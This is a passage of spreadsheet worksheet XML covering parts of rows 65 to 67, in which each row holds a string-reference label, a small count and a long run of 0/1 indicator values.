        <v>0</v>
      </c>
      <c r="NZ65">
        <v>0</v>
      </c>
      <c r="OA65">
        <v>0</v>
      </c>
      <c r="OB65">
        <v>0</v>
      </c>
      <c r="OC65">
        <v>1</v>
      </c>
      <c r="OD65">
        <v>0</v>
      </c>
      <c r="OE65">
        <v>0</v>
      </c>
      <c r="OF65">
        <v>0</v>
      </c>
      <c r="OG65">
        <v>0</v>
      </c>
      <c r="OH65">
        <v>0</v>
      </c>
      <c r="OI65">
        <v>0</v>
      </c>
      <c r="OJ65">
        <v>0</v>
      </c>
      <c r="OK65">
        <v>0</v>
      </c>
      <c r="OL65">
        <v>0</v>
      </c>
      <c r="OM65">
        <v>0</v>
      </c>
      <c r="ON65">
        <v>0</v>
      </c>
      <c r="OO65">
        <v>0</v>
      </c>
      <c r="OP65">
        <v>0</v>
      </c>
      <c r="OQ65">
        <v>0</v>
      </c>
      <c r="OR65">
        <v>0</v>
      </c>
      <c r="OS65">
        <v>0</v>
      </c>
      <c r="OT65">
        <v>0</v>
      </c>
      <c r="OU65">
        <v>0</v>
      </c>
      <c r="OV65">
        <v>0</v>
      </c>
      <c r="OW65">
        <v>1</v>
      </c>
      <c r="OX65">
        <v>0</v>
      </c>
      <c r="OY65">
        <v>0</v>
      </c>
      <c r="OZ65">
        <v>0</v>
      </c>
      <c r="PA65">
        <v>0</v>
      </c>
      <c r="PB65">
        <v>0</v>
      </c>
      <c r="PC65">
        <v>0</v>
      </c>
      <c r="PD65">
        <v>0</v>
      </c>
      <c r="PE65">
        <v>0</v>
      </c>
      <c r="PF65">
        <v>1</v>
      </c>
      <c r="PG65">
        <v>1</v>
      </c>
      <c r="PH65">
        <v>0</v>
      </c>
      <c r="PI65">
        <v>0</v>
      </c>
      <c r="PJ65">
        <v>0</v>
      </c>
      <c r="PK65">
        <v>0</v>
      </c>
      <c r="PL65">
        <v>0</v>
      </c>
      <c r="PM65">
        <v>0</v>
      </c>
      <c r="PN65">
        <v>0</v>
      </c>
      <c r="PO65">
        <v>0</v>
      </c>
      <c r="PP65">
        <v>1</v>
      </c>
      <c r="PQ65">
        <v>0</v>
      </c>
      <c r="PR65">
        <v>0</v>
      </c>
      <c r="PS65">
        <v>0</v>
      </c>
      <c r="PT65">
        <v>0</v>
      </c>
      <c r="PU65">
        <v>0</v>
      </c>
      <c r="PV65">
        <v>0</v>
      </c>
      <c r="PW65">
        <v>0</v>
      </c>
      <c r="PX65">
        <v>0</v>
      </c>
      <c r="PY65">
        <v>0</v>
      </c>
      <c r="PZ65">
        <v>0</v>
      </c>
      <c r="QA65">
        <v>0</v>
      </c>
      <c r="QB65">
        <v>0</v>
      </c>
      <c r="QC65">
        <v>0</v>
      </c>
      <c r="QD65">
        <v>0</v>
      </c>
      <c r="QE65">
        <v>0</v>
      </c>
      <c r="QF65">
        <v>0</v>
      </c>
      <c r="QG65">
        <v>0</v>
      </c>
      <c r="QH65">
        <v>0</v>
      </c>
      <c r="QI65">
        <v>0</v>
      </c>
      <c r="QJ65">
        <v>0</v>
      </c>
      <c r="QK65">
        <v>0</v>
      </c>
      <c r="QL65">
        <v>0</v>
      </c>
      <c r="QM65">
        <v>0</v>
      </c>
      <c r="QN65">
        <v>1</v>
      </c>
      <c r="QO65">
        <v>0</v>
      </c>
      <c r="QP65">
        <v>0</v>
      </c>
      <c r="QQ65">
        <v>0</v>
      </c>
      <c r="QR65">
        <v>0</v>
      </c>
      <c r="QS65">
        <v>1</v>
      </c>
      <c r="QT65">
        <v>0</v>
      </c>
      <c r="QU65">
        <v>0</v>
      </c>
      <c r="QV65">
        <v>0</v>
      </c>
      <c r="QW65">
        <v>0</v>
      </c>
      <c r="QX65">
        <v>0</v>
      </c>
      <c r="QY65">
        <v>0</v>
      </c>
      <c r="QZ65">
        <v>0</v>
      </c>
      <c r="RA65">
        <v>0</v>
      </c>
      <c r="RB65">
        <v>0</v>
      </c>
      <c r="RC65">
        <v>0</v>
      </c>
      <c r="RD65">
        <v>0</v>
      </c>
      <c r="RE65">
        <v>0</v>
      </c>
      <c r="RF65">
        <v>0</v>
      </c>
      <c r="RG65">
        <v>0</v>
      </c>
      <c r="RH65">
        <v>0</v>
      </c>
      <c r="RI65">
        <v>0</v>
      </c>
      <c r="RJ65">
        <v>0</v>
      </c>
      <c r="RK65">
        <v>0</v>
      </c>
      <c r="RL65">
        <v>0</v>
      </c>
      <c r="RM65">
        <v>1</v>
      </c>
      <c r="RN65">
        <v>0</v>
      </c>
      <c r="RO65">
        <v>0</v>
      </c>
      <c r="RP65">
        <v>0</v>
      </c>
      <c r="RQ65">
        <v>0</v>
      </c>
      <c r="RR65">
        <v>1</v>
      </c>
      <c r="RS65">
        <v>0</v>
      </c>
      <c r="RT65">
        <v>0</v>
      </c>
      <c r="RU65">
        <v>0</v>
      </c>
      <c r="RV65">
        <v>0</v>
      </c>
      <c r="RW65">
        <v>0</v>
      </c>
      <c r="RX65">
        <v>0</v>
      </c>
      <c r="RY65">
        <v>0</v>
      </c>
      <c r="RZ65">
        <v>0</v>
      </c>
      <c r="SA65">
        <v>0</v>
      </c>
    </row>
    <row r="66" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A66" s="6" t="s">
        <v>3137</v>
      </c>
      <c r="B66">
        <v>4</v>
      </c>
      <c r="C66">
        <v>0</v>
      </c>
      <c r="D66">
        <v>0</v>
      </c>
      <c r="E66">
        <v>0</v>
      </c>
      <c r="F66">
        <v>0</v>
      </c>
      <c r="G66">
        <v>0</v>
      </c>
      <c r="H66">
        <v>0</v>
      </c>
      <c r="I66">
        <v>0</v>
      </c>
      <c r="J66">
        <v>0</v>
      </c>
      <c r="K66">
        <v>0</v>
      </c>
      <c r="L66">
        <v>0</v>
      </c>
      <c r="M66">
        <v>0</v>
      </c>
      <c r="N66">
        <v>0</v>
      </c>
      <c r="O66">
        <v>0</v>
      </c>
      <c r="P66">
        <v>0</v>
      </c>
      <c r="Q66">
        <v>0</v>
      </c>
      <c r="R66">
        <v>0</v>
      </c>
      <c r="S66">
        <v>0</v>
      </c>
      <c r="T66">
        <v>0</v>
      </c>
      <c r="U66">
        <v>0</v>
      </c>
      <c r="V66">
        <v>0</v>
      </c>
      <c r="W66">
        <v>0</v>
      </c>
      <c r="X66">
        <v>0</v>
      </c>
      <c r="Y66">
        <v>0</v>
      </c>
      <c r="Z66">
        <v>0</v>
      </c>
      <c r="AA66">
        <v>0</v>
      </c>
      <c r="AB66">
        <v>0</v>
      </c>
      <c r="AC66">
        <v>0</v>
      </c>
      <c r="AD66">
        <v>0</v>
      </c>
      <c r="AE66">
        <v>0</v>
      </c>
      <c r="AF66">
        <v>0</v>
      </c>
      <c r="AG66">
        <v>0</v>
      </c>
      <c r="AH66">
        <v>0</v>
      </c>
      <c r="AI66">
        <v>0</v>
      </c>
      <c r="AJ66">
        <v>0</v>
      </c>
      <c r="AK66">
        <v>0</v>
      </c>
      <c r="AL66">
        <v>0</v>
      </c>
      <c r="AM66">
        <v>0</v>
      </c>
      <c r="AN66">
        <v>0</v>
      </c>
      <c r="AO66">
        <v>0</v>
      </c>
      <c r="AP66">
        <v>0</v>
      </c>
      <c r="AQ66">
        <v>0</v>
      </c>
      <c r="AR66">
        <v>0</v>
      </c>
      <c r="AS66">
        <v>0</v>
      </c>
      <c r="AT66">
        <v>0</v>
      </c>
      <c r="AU66">
        <v>0</v>
      </c>
      <c r="AV66">
        <v>0</v>
      </c>
      <c r="AW66">
        <v>0</v>
      </c>
      <c r="AX66">
        <v>0</v>
      </c>
      <c r="AY66">
        <v>0</v>
      </c>
      <c r="AZ66">
        <v>0</v>
      </c>
      <c r="BA66">
        <v>0</v>
      </c>
      <c r="BB66">
        <v>0</v>
      </c>
      <c r="BC66">
        <v>0</v>
      </c>
      <c r="BD66">
        <v>0</v>
      </c>
      <c r="BE66">
        <v>0</v>
      </c>
      <c r="BF66">
        <v>0</v>
      </c>
      <c r="BG66">
        <v>0</v>
      </c>
      <c r="BH66">
        <v>0</v>
      </c>
      <c r="BI66">
        <v>0</v>
      </c>
      <c r="BJ66">
        <v>1</v>
      </c>
      <c r="BK66">
        <v>0</v>
      </c>
      <c r="BL66">
        <v>0</v>
      </c>
      <c r="BM66">
        <v>0</v>
      </c>
      <c r="BN66">
        <v>0</v>
      </c>
      <c r="BO66">
        <v>0</v>
      </c>
      <c r="BP66">
        <v>0</v>
      </c>
      <c r="BQ66">
        <v>0</v>
      </c>
      <c r="BR66">
        <v>0</v>
      </c>
      <c r="BS66">
        <v>0</v>
      </c>
      <c r="BT66">
        <v>0</v>
      </c>
      <c r="BU66">
        <v>0</v>
      </c>
      <c r="BV66">
        <v>0</v>
      </c>
      <c r="BW66">
        <v>0</v>
      </c>
      <c r="BX66">
        <v>0</v>
      </c>
      <c r="BY66">
        <v>0</v>
      </c>
      <c r="BZ66">
        <v>0</v>
      </c>
      <c r="CA66">
        <v>0</v>
      </c>
      <c r="CB66">
        <v>0</v>
      </c>
      <c r="CC66">
        <v>0</v>
      </c>
      <c r="CD66">
        <v>0</v>
      </c>
      <c r="CE66">
        <v>0</v>
      </c>
      <c r="CF66">
        <v>0</v>
      </c>
      <c r="CG66">
        <v>0</v>
      </c>
      <c r="CH66">
        <v>0</v>
      </c>
      <c r="CI66">
        <v>0</v>
      </c>
      <c r="CJ66">
        <v>0</v>
      </c>
      <c r="CK66">
        <v>0</v>
      </c>
      <c r="CL66">
        <v>0</v>
      </c>
      <c r="CM66">
        <v>0</v>
      </c>
      <c r="CN66">
        <v>0</v>
      </c>
      <c r="CO66">
        <v>0</v>
      </c>
      <c r="CP66">
        <v>0</v>
      </c>
      <c r="CQ66">
        <v>0</v>
      </c>
      <c r="CR66">
        <v>0</v>
      </c>
      <c r="CS66">
        <v>0</v>
      </c>
      <c r="CT66">
        <v>0</v>
      </c>
      <c r="CU66">
        <v>0</v>
      </c>
      <c r="CV66">
        <v>0</v>
      </c>
      <c r="CW66">
        <v>0</v>
      </c>
      <c r="CX66">
        <v>0</v>
      </c>
      <c r="CY66">
        <v>0</v>
      </c>
      <c r="CZ66">
        <v>0</v>
      </c>
      <c r="DA66">
        <v>0</v>
      </c>
      <c r="DB66">
        <v>0</v>
      </c>
      <c r="DC66">
        <v>0</v>
      </c>
      <c r="DD66">
        <v>0</v>
      </c>
      <c r="DE66">
        <v>0</v>
      </c>
      <c r="DF66">
        <v>0</v>
      </c>
      <c r="DG66">
        <v>0</v>
      </c>
      <c r="DH66">
        <v>0</v>
      </c>
      <c r="DI66">
        <v>0</v>
      </c>
      <c r="DJ66">
        <v>0</v>
      </c>
      <c r="DK66">
        <v>0</v>
      </c>
      <c r="DL66">
        <v>0</v>
      </c>
      <c r="DM66">
        <v>0</v>
      </c>
      <c r="DN66">
        <v>0</v>
      </c>
      <c r="DO66">
        <v>0</v>
      </c>
      <c r="DP66">
        <v>0</v>
      </c>
      <c r="DQ66">
        <v>0</v>
      </c>
      <c r="DR66">
        <v>0</v>
      </c>
      <c r="DS66">
        <v>0</v>
      </c>
      <c r="DT66">
        <v>0</v>
      </c>
      <c r="DU66">
        <v>0</v>
      </c>
      <c r="DV66">
        <v>0</v>
      </c>
      <c r="DW66">
        <v>0</v>
      </c>
      <c r="DX66">
        <v>0</v>
      </c>
      <c r="DY66">
        <v>0</v>
      </c>
      <c r="DZ66">
        <v>0</v>
      </c>
      <c r="EA66">
        <v>0</v>
      </c>
      <c r="EB66">
        <v>0</v>
      </c>
      <c r="EC66">
        <v>0</v>
      </c>
      <c r="ED66">
        <v>0</v>
      </c>
      <c r="EE66">
        <v>0</v>
      </c>
      <c r="EF66">
        <v>0</v>
      </c>
      <c r="EG66">
        <v>0</v>
      </c>
      <c r="EH66">
        <v>0</v>
      </c>
      <c r="EI66">
        <v>0</v>
      </c>
      <c r="EJ66">
        <v>0</v>
      </c>
      <c r="EK66">
        <v>0</v>
      </c>
      <c r="EL66">
        <v>0</v>
      </c>
      <c r="EM66">
        <v>0</v>
      </c>
      <c r="EN66">
        <v>0</v>
      </c>
      <c r="EO66">
        <v>0</v>
      </c>
      <c r="EP66">
        <v>0</v>
      </c>
      <c r="EQ66">
        <v>0</v>
      </c>
      <c r="ER66">
        <v>0</v>
      </c>
      <c r="ES66">
        <v>0</v>
      </c>
      <c r="ET66">
        <v>0</v>
      </c>
      <c r="EU66">
        <v>0</v>
      </c>
      <c r="EV66">
        <v>0</v>
      </c>
      <c r="EW66">
        <v>0</v>
      </c>
      <c r="EX66">
        <v>0</v>
      </c>
      <c r="EY66">
        <v>0</v>
      </c>
      <c r="EZ66">
        <v>0</v>
      </c>
      <c r="FA66">
        <v>0</v>
      </c>
      <c r="FB66">
        <v>0</v>
      </c>
      <c r="FC66">
        <v>0</v>
      </c>
      <c r="FD66">
        <v>0</v>
      </c>
      <c r="FE66">
        <v>0</v>
      </c>
      <c r="FF66">
        <v>0</v>
      </c>
      <c r="FG66">
        <v>0</v>
      </c>
      <c r="FH66">
        <v>0</v>
      </c>
      <c r="FI66">
        <v>0</v>
      </c>
      <c r="FJ66">
        <v>0</v>
      </c>
      <c r="FK66">
        <v>0</v>
      </c>
      <c r="FL66">
        <v>0</v>
      </c>
      <c r="FM66">
        <v>0</v>
      </c>
      <c r="FN66">
        <v>0</v>
      </c>
      <c r="FO66">
        <v>0</v>
      </c>
      <c r="FP66">
        <v>0</v>
      </c>
      <c r="FQ66">
        <v>0</v>
      </c>
      <c r="FR66">
        <v>0</v>
      </c>
      <c r="FS66">
        <v>0</v>
      </c>
      <c r="FT66">
        <v>0</v>
      </c>
      <c r="FU66">
        <v>0</v>
      </c>
      <c r="FV66">
        <v>0</v>
      </c>
      <c r="FW66">
        <v>0</v>
      </c>
      <c r="FX66">
        <v>0</v>
      </c>
      <c r="FY66">
        <v>0</v>
      </c>
      <c r="FZ66">
        <v>0</v>
      </c>
      <c r="GA66">
        <v>0</v>
      </c>
      <c r="GB66">
        <v>0</v>
      </c>
      <c r="GC66">
        <v>0</v>
      </c>
      <c r="GD66">
        <v>0</v>
      </c>
      <c r="GE66">
        <v>0</v>
      </c>
      <c r="GF66">
        <v>0</v>
      </c>
      <c r="GG66">
        <v>0</v>
      </c>
      <c r="GH66">
        <v>0</v>
      </c>
      <c r="GI66">
        <v>0</v>
      </c>
      <c r="GJ66">
        <v>0</v>
      </c>
      <c r="GK66">
        <v>0</v>
      </c>
      <c r="GL66">
        <v>0</v>
      </c>
      <c r="GM66">
        <v>0</v>
      </c>
      <c r="GN66">
        <v>0</v>
      </c>
      <c r="GO66">
        <v>0</v>
      </c>
      <c r="GP66">
        <v>0</v>
      </c>
      <c r="GQ66">
        <v>0</v>
      </c>
      <c r="GR66">
        <v>0</v>
      </c>
      <c r="GS66">
        <v>0</v>
      </c>
      <c r="GT66">
        <v>0</v>
      </c>
      <c r="GU66">
        <v>0</v>
      </c>
      <c r="GV66">
        <v>0</v>
      </c>
      <c r="GW66">
        <v>0</v>
      </c>
      <c r="GX66">
        <v>0</v>
      </c>
      <c r="GY66">
        <v>0</v>
      </c>
      <c r="GZ66">
        <v>0</v>
      </c>
      <c r="HA66">
        <v>0</v>
      </c>
      <c r="HB66">
        <v>0</v>
      </c>
      <c r="HC66">
        <v>0</v>
      </c>
      <c r="HD66">
        <v>0</v>
      </c>
      <c r="HE66">
        <v>0</v>
      </c>
      <c r="HF66">
        <v>1</v>
      </c>
      <c r="HG66">
        <v>0</v>
      </c>
      <c r="HH66">
        <v>0</v>
      </c>
      <c r="HI66">
        <v>0</v>
      </c>
      <c r="HJ66">
        <v>0</v>
      </c>
      <c r="HK66">
        <v>0</v>
      </c>
      <c r="HL66">
        <v>0</v>
      </c>
      <c r="HM66">
        <v>0</v>
      </c>
      <c r="HN66">
        <v>0</v>
      </c>
      <c r="HO66">
        <v>0</v>
      </c>
      <c r="HP66">
        <v>0</v>
      </c>
      <c r="HQ66">
        <v>0</v>
      </c>
      <c r="HR66">
        <v>0</v>
      </c>
      <c r="HS66">
        <v>0</v>
      </c>
      <c r="HT66">
        <v>0</v>
      </c>
      <c r="HU66">
        <v>0</v>
      </c>
      <c r="HV66">
        <v>0</v>
      </c>
      <c r="HW66">
        <v>0</v>
      </c>
      <c r="HX66">
        <v>0</v>
      </c>
      <c r="HY66">
        <v>0</v>
      </c>
      <c r="HZ66">
        <v>0</v>
      </c>
      <c r="IA66">
        <v>0</v>
      </c>
      <c r="IB66">
        <v>0</v>
      </c>
      <c r="IC66">
        <v>0</v>
      </c>
      <c r="ID66">
        <v>0</v>
      </c>
      <c r="IE66">
        <v>0</v>
      </c>
      <c r="IF66">
        <v>0</v>
      </c>
      <c r="IG66">
        <v>0</v>
      </c>
      <c r="IH66">
        <v>0</v>
      </c>
      <c r="II66">
        <v>0</v>
      </c>
      <c r="IJ66">
        <v>0</v>
      </c>
      <c r="IK66">
        <v>0</v>
      </c>
      <c r="IL66">
        <v>0</v>
      </c>
      <c r="IM66">
        <v>0</v>
      </c>
      <c r="IN66">
        <v>0</v>
      </c>
      <c r="IO66">
        <v>0</v>
      </c>
      <c r="IP66">
        <v>0</v>
      </c>
      <c r="IQ66">
        <v>0</v>
      </c>
      <c r="IR66">
        <v>0</v>
      </c>
      <c r="IS66">
        <v>0</v>
      </c>
      <c r="IT66">
        <v>0</v>
      </c>
      <c r="IU66">
        <v>0</v>
      </c>
      <c r="IV66">
        <v>0</v>
      </c>
      <c r="IW66">
        <v>0</v>
      </c>
      <c r="IX66">
        <v>0</v>
      </c>
      <c r="IY66">
        <v>0</v>
      </c>
      <c r="IZ66">
        <v>0</v>
      </c>
      <c r="JA66">
        <v>0</v>
      </c>
      <c r="JB66">
        <v>0</v>
      </c>
      <c r="JC66">
        <v>0</v>
      </c>
      <c r="JD66">
        <v>0</v>
      </c>
      <c r="JE66">
        <v>0</v>
      </c>
      <c r="JF66">
        <v>0</v>
      </c>
      <c r="JG66">
        <v>0</v>
      </c>
      <c r="JH66">
        <v>0</v>
      </c>
      <c r="JI66">
        <v>0</v>
      </c>
      <c r="JJ66">
        <v>0</v>
      </c>
      <c r="JK66">
        <v>0</v>
      </c>
      <c r="JL66">
        <v>0</v>
      </c>
      <c r="JM66">
        <v>0</v>
      </c>
      <c r="JN66">
        <v>0</v>
      </c>
      <c r="JO66">
        <v>0</v>
      </c>
      <c r="JP66">
        <v>0</v>
      </c>
      <c r="JQ66">
        <v>0</v>
      </c>
      <c r="JR66">
        <v>0</v>
      </c>
      <c r="JS66">
        <v>0</v>
      </c>
      <c r="JT66">
        <v>0</v>
      </c>
      <c r="JU66">
        <v>0</v>
      </c>
      <c r="JV66">
        <v>0</v>
      </c>
      <c r="JW66">
        <v>0</v>
      </c>
      <c r="JX66">
        <v>0</v>
      </c>
      <c r="JY66">
        <v>0</v>
      </c>
      <c r="JZ66">
        <v>0</v>
      </c>
      <c r="KA66">
        <v>0</v>
      </c>
      <c r="KB66">
        <v>0</v>
      </c>
      <c r="KC66">
        <v>0</v>
      </c>
      <c r="KD66">
        <v>0</v>
      </c>
      <c r="KE66">
        <v>0</v>
      </c>
      <c r="KF66">
        <v>0</v>
      </c>
      <c r="KG66">
        <v>0</v>
      </c>
      <c r="KH66">
        <v>0</v>
      </c>
      <c r="KI66">
        <v>0</v>
      </c>
      <c r="KJ66">
        <v>0</v>
      </c>
      <c r="KK66">
        <v>0</v>
      </c>
      <c r="KL66">
        <v>0</v>
      </c>
      <c r="KM66">
        <v>0</v>
      </c>
      <c r="KN66">
        <v>0</v>
      </c>
      <c r="KO66">
        <v>0</v>
      </c>
      <c r="KP66">
        <v>0</v>
      </c>
      <c r="KQ66">
        <v>0</v>
      </c>
      <c r="KR66">
        <v>0</v>
      </c>
      <c r="KS66">
        <v>0</v>
      </c>
      <c r="KT66">
        <v>0</v>
      </c>
      <c r="KU66">
        <v>0</v>
      </c>
      <c r="KV66">
        <v>0</v>
      </c>
      <c r="KW66">
        <v>0</v>
      </c>
      <c r="KX66">
        <v>0</v>
      </c>
      <c r="KY66">
        <v>0</v>
      </c>
      <c r="KZ66">
        <v>0</v>
      </c>
      <c r="LA66">
        <v>0</v>
      </c>
      <c r="LB66">
        <v>0</v>
      </c>
      <c r="LC66">
        <v>0</v>
      </c>
      <c r="LD66">
        <v>0</v>
      </c>
      <c r="LE66">
        <v>1</v>
      </c>
      <c r="LF66">
        <v>0</v>
      </c>
      <c r="LG66">
        <v>0</v>
      </c>
      <c r="LH66">
        <v>0</v>
      </c>
      <c r="LI66">
        <v>0</v>
      </c>
      <c r="LJ66">
        <v>0</v>
      </c>
      <c r="LK66">
        <v>0</v>
      </c>
      <c r="LL66">
        <v>0</v>
      </c>
      <c r="LM66">
        <v>0</v>
      </c>
      <c r="LN66">
        <v>0</v>
      </c>
      <c r="LO66">
        <v>0</v>
      </c>
      <c r="LP66">
        <v>0</v>
      </c>
      <c r="LQ66">
        <v>0</v>
      </c>
      <c r="LR66">
        <v>0</v>
      </c>
      <c r="LS66">
        <v>0</v>
      </c>
      <c r="LT66">
        <v>0</v>
      </c>
      <c r="LU66">
        <v>0</v>
      </c>
      <c r="LV66">
        <v>0</v>
      </c>
      <c r="LW66">
        <v>0</v>
      </c>
      <c r="LX66">
        <v>0</v>
      </c>
      <c r="LY66">
        <v>0</v>
      </c>
      <c r="LZ66">
        <v>0</v>
      </c>
      <c r="MA66">
        <v>0</v>
      </c>
      <c r="MB66">
        <v>0</v>
      </c>
      <c r="MC66">
        <v>0</v>
      </c>
      <c r="MD66">
        <v>0</v>
      </c>
      <c r="ME66">
        <v>0</v>
      </c>
      <c r="MF66">
        <v>0</v>
      </c>
      <c r="MG66">
        <v>0</v>
      </c>
      <c r="MH66">
        <v>0</v>
      </c>
      <c r="MI66">
        <v>0</v>
      </c>
      <c r="MJ66">
        <v>0</v>
      </c>
      <c r="MK66">
        <v>0</v>
      </c>
      <c r="ML66">
        <v>0</v>
      </c>
      <c r="MM66">
        <v>0</v>
      </c>
      <c r="MN66">
        <v>0</v>
      </c>
      <c r="MO66">
        <v>0</v>
      </c>
      <c r="MP66">
        <v>0</v>
      </c>
      <c r="MQ66">
        <v>0</v>
      </c>
      <c r="MR66">
        <v>0</v>
      </c>
      <c r="MS66">
        <v>0</v>
      </c>
      <c r="MT66">
        <v>0</v>
      </c>
      <c r="MU66">
        <v>0</v>
      </c>
      <c r="MV66">
        <v>0</v>
      </c>
      <c r="MW66">
        <v>0</v>
      </c>
      <c r="MX66">
        <v>0</v>
      </c>
      <c r="MY66">
        <v>0</v>
      </c>
      <c r="MZ66">
        <v>0</v>
      </c>
      <c r="NA66">
        <v>0</v>
      </c>
      <c r="NB66">
        <v>0</v>
      </c>
      <c r="NC66">
        <v>0</v>
      </c>
      <c r="ND66">
        <v>0</v>
      </c>
      <c r="NE66">
        <v>0</v>
      </c>
      <c r="NF66">
        <v>0</v>
      </c>
      <c r="NG66">
        <v>0</v>
      </c>
      <c r="NH66">
        <v>0</v>
      </c>
      <c r="NI66">
        <v>0</v>
      </c>
      <c r="NJ66">
        <v>0</v>
      </c>
      <c r="NK66">
        <v>0</v>
      </c>
      <c r="NL66">
        <v>0</v>
      </c>
      <c r="NM66">
        <v>0</v>
      </c>
      <c r="NN66">
        <v>0</v>
      </c>
      <c r="NO66">
        <v>0</v>
      </c>
      <c r="NP66">
        <v>0</v>
      </c>
      <c r="NQ66">
        <v>0</v>
      </c>
      <c r="NR66">
        <v>0</v>
      </c>
      <c r="NS66">
        <v>0</v>
      </c>
      <c r="NT66">
        <v>0</v>
      </c>
      <c r="NU66">
        <v>0</v>
      </c>
      <c r="NV66">
        <v>0</v>
      </c>
      <c r="NW66">
        <v>0</v>
      </c>
      <c r="NX66">
        <v>0</v>
      </c>
      <c r="NY66">
        <v>0</v>
      </c>
      <c r="NZ66">
        <v>0</v>
      </c>
      <c r="OA66">
        <v>0</v>
      </c>
      <c r="OB66">
        <v>0</v>
      </c>
      <c r="OC66">
        <v>0</v>
      </c>
      <c r="OD66">
        <v>0</v>
      </c>
      <c r="OE66">
        <v>0</v>
      </c>
      <c r="OF66">
        <v>0</v>
      </c>
      <c r="OG66">
        <v>0</v>
      </c>
      <c r="OH66">
        <v>0</v>
      </c>
      <c r="OI66">
        <v>0</v>
      </c>
      <c r="OJ66">
        <v>0</v>
      </c>
      <c r="OK66">
        <v>0</v>
      </c>
      <c r="OL66">
        <v>0</v>
      </c>
      <c r="OM66">
        <v>0</v>
      </c>
      <c r="ON66">
        <v>0</v>
      </c>
      <c r="OO66">
        <v>0</v>
      </c>
      <c r="OP66">
        <v>0</v>
      </c>
      <c r="OQ66">
        <v>0</v>
      </c>
      <c r="OR66">
        <v>0</v>
      </c>
      <c r="OS66">
        <v>0</v>
      </c>
      <c r="OT66">
        <v>0</v>
      </c>
      <c r="OU66">
        <v>0</v>
      </c>
      <c r="OV66">
        <v>0</v>
      </c>
      <c r="OW66">
        <v>0</v>
      </c>
      <c r="OX66">
        <v>0</v>
      </c>
      <c r="OY66">
        <v>0</v>
      </c>
      <c r="OZ66">
        <v>0</v>
      </c>
      <c r="PA66">
        <v>0</v>
      </c>
      <c r="PB66">
        <v>0</v>
      </c>
      <c r="PC66">
        <v>0</v>
      </c>
      <c r="PD66">
        <v>0</v>
      </c>
      <c r="PE66">
        <v>0</v>
      </c>
      <c r="PF66">
        <v>0</v>
      </c>
      <c r="PG66">
        <v>0</v>
      </c>
      <c r="PH66">
        <v>0</v>
      </c>
      <c r="PI66">
        <v>0</v>
      </c>
      <c r="PJ66">
        <v>0</v>
      </c>
      <c r="PK66">
        <v>0</v>
      </c>
      <c r="PL66">
        <v>0</v>
      </c>
      <c r="PM66">
        <v>0</v>
      </c>
      <c r="PN66">
        <v>0</v>
      </c>
      <c r="PO66">
        <v>0</v>
      </c>
      <c r="PP66">
        <v>0</v>
      </c>
      <c r="PQ66">
        <v>0</v>
      </c>
      <c r="PR66">
        <v>0</v>
      </c>
      <c r="PS66">
        <v>0</v>
      </c>
      <c r="PT66">
        <v>0</v>
      </c>
      <c r="PU66">
        <v>0</v>
      </c>
      <c r="PV66">
        <v>0</v>
      </c>
      <c r="PW66">
        <v>0</v>
      </c>
      <c r="PX66">
        <v>0</v>
      </c>
      <c r="PY66">
        <v>0</v>
      </c>
      <c r="PZ66">
        <v>0</v>
      </c>
      <c r="QA66">
        <v>0</v>
      </c>
      <c r="QB66">
        <v>0</v>
      </c>
      <c r="QC66">
        <v>0</v>
      </c>
      <c r="QD66">
        <v>0</v>
      </c>
      <c r="QE66">
        <v>0</v>
      </c>
      <c r="QF66">
        <v>0</v>
      </c>
      <c r="QG66">
        <v>0</v>
      </c>
      <c r="QH66">
        <v>0</v>
      </c>
      <c r="QI66">
        <v>0</v>
      </c>
      <c r="QJ66">
        <v>0</v>
      </c>
      <c r="QK66">
        <v>0</v>
      </c>
      <c r="QL66">
        <v>0</v>
      </c>
      <c r="QM66">
        <v>0</v>
      </c>
      <c r="QN66">
        <v>0</v>
      </c>
      <c r="QO66">
        <v>0</v>
      </c>
      <c r="QP66">
        <v>0</v>
      </c>
      <c r="QQ66">
        <v>0</v>
      </c>
      <c r="QR66">
        <v>0</v>
      </c>
      <c r="QS66">
        <v>0</v>
      </c>
      <c r="QT66">
        <v>0</v>
      </c>
      <c r="QU66">
        <v>0</v>
      </c>
      <c r="QV66">
        <v>0</v>
      </c>
      <c r="QW66">
        <v>0</v>
      </c>
      <c r="QX66">
        <v>0</v>
      </c>
      <c r="QY66">
        <v>0</v>
      </c>
      <c r="QZ66">
        <v>0</v>
      </c>
      <c r="RA66">
        <v>0</v>
      </c>
      <c r="RB66">
        <v>0</v>
      </c>
      <c r="RC66">
        <v>0</v>
      </c>
      <c r="RD66">
        <v>0</v>
      </c>
      <c r="RE66">
        <v>0</v>
      </c>
      <c r="RF66">
        <v>0</v>
      </c>
      <c r="RG66">
        <v>0</v>
      </c>
      <c r="RH66">
        <v>0</v>
      </c>
      <c r="RI66">
        <v>0</v>
      </c>
      <c r="RJ66">
        <v>1</v>
      </c>
      <c r="RK66">
        <v>0</v>
      </c>
      <c r="RL66">
        <v>0</v>
      </c>
      <c r="RM66">
        <v>0</v>
      </c>
      <c r="RN66">
        <v>0</v>
      </c>
      <c r="RO66">
        <v>0</v>
      </c>
      <c r="RP66">
        <v>0</v>
      </c>
      <c r="RQ66">
        <v>0</v>
      </c>
      <c r="RR66">
        <v>0</v>
      </c>
      <c r="RS66">
        <v>0</v>
      </c>
      <c r="RT66">
        <v>0</v>
      </c>
      <c r="RU66">
        <v>0</v>
      </c>
      <c r="RV66">
        <v>0</v>
      </c>
      <c r="RW66">
        <v>0</v>
      </c>
      <c r="RX66">
        <v>0</v>
      </c>
      <c r="RY66">
        <v>0</v>
      </c>
      <c r="RZ66">
        <v>0</v>
      </c>
      <c r="SA66">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A67" s="6" t="s">
        <v>3144</v>
      </c>
      <c r="B67">
        <v>2</v>
      </c>
      <c r="C67">
        <v>0</v>
      </c>
      <c r="D67">
        <v>0</v>
      </c>
      <c r="E67">
        <v>0</v>
      </c>
      <c r="F67">
        <v>0</v>
      </c>
      <c r="G67">
        <v>0</v>
      </c>
      <c r="H67">
        <v>0</v>
      </c>
      <c r="I67">
        <v>0</v>
      </c>
      <c r="J67">
        <v>0</v>
      </c>
      <c r="K67">
        <v>0</v>
      </c>
      <c r="L67">
        <v>0</v>
      </c>
      <c r="M67">
        <v>0</v>
      </c>
      <c r="N67">
        <v>0</v>
      </c>
      <c r="O67">
        <v>0</v>
      </c>
      <c r="P67">
        <v>0</v>
      </c>
      <c r="Q67">
        <v>0</v>
      </c>
      <c r="R67">
        <v>0</v>
      </c>
      <c r="S67">
